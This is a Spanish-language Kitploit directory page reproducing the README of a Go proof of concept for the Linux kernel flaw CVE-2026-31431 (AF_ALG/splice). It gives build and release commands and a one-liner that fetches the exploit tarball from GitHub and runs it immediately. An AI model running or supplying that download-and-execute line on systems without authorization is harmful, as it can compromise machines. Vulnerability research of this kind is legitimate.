Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Copy-Fail-CVE-2026-31431-Statically-PoC — Prueba de concepto estática en Go para CVE-2026-31431, que aprovecha Linux AF_ALG y splice(2) para desencadenar la vulnerabilidad. Proporciona binarios precompilados para amd64, arm64 y 386. | Kitploit
Herramientas/GitHubGitHub/percivalll/copy-fail-cve-2026-31431-statically-poc
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónDesarrollo de PayloadsExplotación de Binarios
GitHubpercivalll/copy-fail-cve-2026-31431-statically-poc

Copy-Fail-CVE-2026-31431-Statically-PoC

Prueba de concepto estática en Go para CVE-2026-31431, que aprovecha Linux AF_ALG y splice(2) para desencadenar la vulnerabilidad. Proporciona binarios precompilados para amd64, arm64 y 386.

Ver Repositorio
31hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Copy-Fail CVE-2026-31431 PoC estático en Go

Este repositorio contiene un port a Go de la prueba de concepto pública en Python de theori-io/copy-fail-CVE-2026-31431.

El programa es solo para Linux. Utiliza la interfaz AF_ALG de Linux, mensajes de control AEAD y splice(2) para preservar el comportamiento del PoC original mientras se compila como un pequeño binario estático en Go.

Objetivos compatibles

Las compilaciones de lanzamiento se generan para:

  • linux/amd64
  • linux/arm64
  • linux/386

Cada binario incorpora un ELF de carga útil para la misma arquitectura de destino.

Las compilaciones para macOS y Windows no se publican intencionalmente porque el PoC depende de interfaces del kernel específicas de Linux.

Descarga

Los lanzamientos etiquetados publican binarios estáticos comprimidos y un manifiesto de sumas de verificación:

  • copy-fail-poc-linux-amd64.tar.gz
  • copy-fail-poc-linux-arm64.tar.gz
  • copy-fail-poc-linux-386.tar.gz
  • SHA256SUMS

Verifique un artefacto descargado con:

root@kitploit:~
sha256sum -c SHA256SUMS

Compilar localmente

Requisitos:

  • Go 1.25 o superior
  • Soporte de destino Linux desde el toolchain de Go

Compile la arquitectura del host actual:

root@kitploit:~
CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc ./cmd/copy-fail-poc

Compilación cruzada para un destino Linux:

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc-linux-amd64 ./cmd/copy-fail-poc

Los valores GOARCH compatibles son amd64, arm64 y 386.

Ejecute las pruebas:

root@kitploit:~
go test ./...
go vet ./...

Las pruebas solo cubren la lógica auxiliar no destructiva. No ejecutan la ruta de activación del PoC.

Uso

Ejecute el binario en un sistema Linux que le pertenezca o para el que tenga autorización explícita de prueba:

root@kitploit:~
./copy-fail-poc-linux-*

Descarga y ejecución de lanzamiento en una sola línea:

root@kitploit:~
sh -c 'set -e; case "$(uname -m)" in x86_64) a=amd64;; aarch64|arm64) a=arm64;; i386|i686) a=386;; *) echo "unsupported arch: $(uname -m)" >&2; exit 1;; esac; curl -fsSL "https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC/releases/latest/download/copy-fail-poc-linux-${a}.tar.gz" | tar xz; ./copy-fail-poc-linux-${a}'

El comportamiento depende del kernel de destino y de la configuración local del sistema. El binario no garantiza una explotación exitosa en todos los sistemas Linux.

Proceso de lanzamiento

El flujo de trabajo de GitHub Actions se ejecuta en etiquetas que coinciden con v* y también se puede iniciar manualmente desde la pestaña Actions.

Cree un lanzamiento:

root@kitploit:~
git tag v0.1.0
git push origin v0.1.0

Para compilaciones con etiqueta, el flujo de trabajo crea un lanzamiento de GitHub y sube los artefactos de Linux más SHA256SUMS. Para ejecuciones manuales, los artefactos están disponibles desde la ejecución del flujo de trabajo.

Aviso de seguridad

Este proyecto se proporciona únicamente para investigación de seguridad autorizada, validación defensiva y revisión educativa. No lo ejecute en sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba. Usted es responsable de cumplir con todas las leyes, contratos y políticas aplicables.

Créditos

  • PoC original: theori-io/copy-fail-CVE-2026-31431
Descargar herramienta